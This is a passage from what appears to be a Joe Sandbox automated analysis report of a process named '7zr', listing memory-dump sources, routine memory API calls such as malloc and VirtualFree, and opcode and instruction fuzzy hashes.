                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: eb7896293a4fcaa9fc7c7cc9b2e3275420876ac23010af5d67ebf0a0fec89b67
                                • Instruction ID: 4637eb70b4d382a281b98aeb2bd1f843869bd72cc84833bb2975dd546cb58d1b
                                • Opcode Fuzzy Hash: eb7896293a4fcaa9fc7c7cc9b2e3275420876ac23010af5d67ebf0a0fec89b67
                                • Instruction Fuzzy Hash: A3C08CE1A4D280DFDF0213108C407603F208B93300F0A00C1E4045B092D6041C08C722
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                • Instruction ID: ed2619eff212866c0fadedbd8398a484cfea5e4904b5d631117b994bac8841ad
                                • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                • Instruction Fuzzy Hash: 15A024C55110C001DD1C13313C015371400177030F7C00CFC7501C0303F715C1041005
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                • Instruction ID: a956935f7709229094ae2bf2f3a25ac460c3e3d4ccf1c0037f4c1b6be02bb11c
                                • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                • Instruction Fuzzy Hash: 4AA012CCE01040019D0411353801533142227F06497D4C874740041205FA14C0042002
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AE6BAC
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-0
                                • Opcode ID: 644b1756ca6037e7ce5950e576120e6d27806d92f73ada292a441517ba704484
                                • Instruction ID: 6c7deb6a7ad9c95ea99992a6aeb6d4e0c8255dc90abc15f6ef31b54821062d59
                                • Opcode Fuzzy Hash: 644b1756ca6037e7ce5950e576120e6d27806d92f73ada292a441517ba704484
                                • Instruction Fuzzy Hash: 6EA00278680700B7ED6067306D4FF5A3B247790F05F30864472416A0D06FE47444DA5C
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                • Instruction ID: 5b366a816e283a45e11b533ddf5850b9c22f815806c3b64ba73c1d0803816e88
                                • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                • Instruction Fuzzy Hash:
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                • Instruction ID: 3e78e24d8ef97d343a515f081858a1c5a90364ae760b6875cfb17b7b8cdc9e76
                                • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                • Instruction Fuzzy Hash: